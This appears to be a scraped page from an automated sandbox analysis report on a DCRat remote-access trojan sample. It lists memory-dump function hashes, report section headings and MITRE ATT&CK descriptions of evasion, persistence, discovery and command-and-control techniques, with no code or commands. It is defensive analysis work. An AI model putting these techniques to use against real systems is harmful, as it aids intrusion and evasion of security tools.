Instruction Fuzzy Hash: 12F02462C9C68E4EF7629B2C980ABFC7BE0EB16708F404576D44DD6092CE751690C381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C40A79, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882e1adf1cc36cff689ed60992506c972c6325cad98ff809cd182fb8543a35f6
Instruction ID: 44981500141ddee40c44a044fa790494a1cba84b6c5120dbe0f4c9fcab80a67d
Opcode Fuzzy Hash: 882e1adf1cc36cff689ed60992506c972c6325cad98ff809cd182fb8543a35f6
Instruction Fuzzy Hash: A2F0CDB2C4D38A8FDB569F28884AAE97FB0EF06304F4440A7D50CDA092DA389544C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C40614, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7d2e0ab712d5f04fd0b98f40436b86533256f9bebb4b817bd85c805e7a256e
Instruction ID: 8bbfdda0a6e725a6b30be6a6e2197ded8da6ed867de3e6728976b1332c262c16
Opcode Fuzzy Hash: 7d7d2e0ab712d5f04fd0b98f40436b86533256f9bebb4b817bd85c805e7a256e
Instruction Fuzzy Hash: C7F06D5194DBE61FD30293BC086A4E96FE99E8B21434C46EEC0E99F1A3D90424139341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C40A3B, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba36d1c94fd545414635b3013c3855807b662d0cd2ba0c55fc956ea7c21f79e
Instruction ID: 70fc613ca5b9ffbf3daaf699e23a04f23013ecd50b5c5cf5301c2f6ffb92e1ad
Opcode Fuzzy Hash: aba36d1c94fd545414635b3013c3855807b662d0cd2ba0c55fc956ea7c21f79e
Instruction Fuzzy Hash: C5E09231C9D50E9EEB50FB68840D5FDB6E4FF05304F005872E40DD1040DD3462948701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C4A617, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0bd83c66ddc1e4007c02b227cede3c1a61b1ec2df6663091a0d61bb6245801a
Instruction ID: 488d66195916380c16f440128232584c93b91f9347b305822501a30b5c2cf261
Opcode Fuzzy Hash: c0bd83c66ddc1e4007c02b227cede3c1a61b1ec2df6663091a0d61bb6245801a
Instruction Fuzzy Hash: 5EE0C265A08AAA4FD282D73C586A6E87FE29F46604F0800EF849DD7192CD101C839640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47E7A, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e6c0ad69fa660d9f3772f5959cbbc72d60a1a2603660447009ce8abbf4d428
Instruction ID: 5b7678ea6123b5d01b6fb4e925c0f335d2a7b49891a45b44bf5f44dcff724330
Opcode Fuzzy Hash: e4e6c0ad69fa660d9f3772f5959cbbc72d60a1a2603660447009ce8abbf4d428
Instruction Fuzzy Hash: A4E08CB290850BCFEB15EB08C441EBD73E1EB52314F00813EC40AD72A1CEBA6542DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C406AE, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee5dca6d0a821d5ef798f8620280375483f2e83f819ddee35e05ffc9559e888
Instruction ID: 1fa153fb68eec265f9b469455453afa61491e4e71f6e047e72fdca230864efb3
Opcode Fuzzy Hash: 3ee5dca6d0a821d5ef798f8620280375483f2e83f819ddee35e05ffc9559e888
Instruction Fuzzy Hash: E1E0C27194801BCFEF01DB08C845AED73A0FB95725F008221C80ABA285DF3C60448F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C48175, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.717978426.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f894f9e905f04f185bd7ab5125883a8f5b1a646a02220b95904ae4643de7f5b
Instruction ID: 4786427d0d1f998a0ec2eebd54215b6f83fef8f6549b13ee8c1c4d3afb69d62d
Opcode Fuzzy Hash: 5f894f9e905f04f185bd7ab5125883a8f5b1a646a02220b95904ae4643de7f5b
Instruction Fuzzy Hash: F1B012B1C0C10B48FB2917584003EFE10900F01708E008439800F000C1CD7ED1033A40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Donate_Caper_Fixed.bin

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: DCRat

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre